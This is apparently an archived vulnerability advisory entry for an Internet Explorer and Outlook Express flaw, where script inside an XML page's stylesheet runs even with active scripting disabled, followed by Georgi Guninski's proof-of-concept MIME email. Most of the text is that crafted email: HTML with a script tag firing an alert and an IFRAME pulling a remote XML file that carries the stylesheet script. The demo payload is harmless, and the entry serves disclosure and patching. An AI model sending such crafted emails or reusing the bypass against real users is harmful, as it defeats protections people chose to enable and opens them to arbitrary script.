35 lines
No EOL
816 B
Text
35 lines
No EOL
816 B
Text
source: http://www.securityfocus.com/bid/2633/info
|
|
|
|
A vulnerability exists in the handling of XML stylesheets in Internet Explorer and Outlook Express. If active scripting is disabled in all security zones, IE and OE will still allow script to run if it is contained in the stylesheet of an XML page.
|
|
|
|
From: "georgi"
|
|
Subject: xstyle
|
|
Date:
|
|
MIME-Version: 1.0
|
|
Content-Type: multipart/alternative;
|
|
boundary="----=_NextPart_000"
|
|
X-Priority: 3
|
|
X-MSMail-Priority: Normal
|
|
|
|
|
|
|
|
This is a multi-part message in MIME format.
|
|
|
|
------=_NextPart_000
|
|
Content-Type: text/html;
|
|
charset="iso-8859-1"
|
|
|
|
|
|
test
|
|
<H1>
|
|
XStyle demo. Written by Georgi Guninski
|
|
</H1>
|
|
|
|
<SCRIPT>
|
|
alert("JS should not be working");
|
|
</SCRIPT>
|
|
|
|
|
|
|
|
<IFRAME SRC="http://www.guninski.com/xstyle.xml"></IFRAME>
|
|
------=_NextPart_000-- |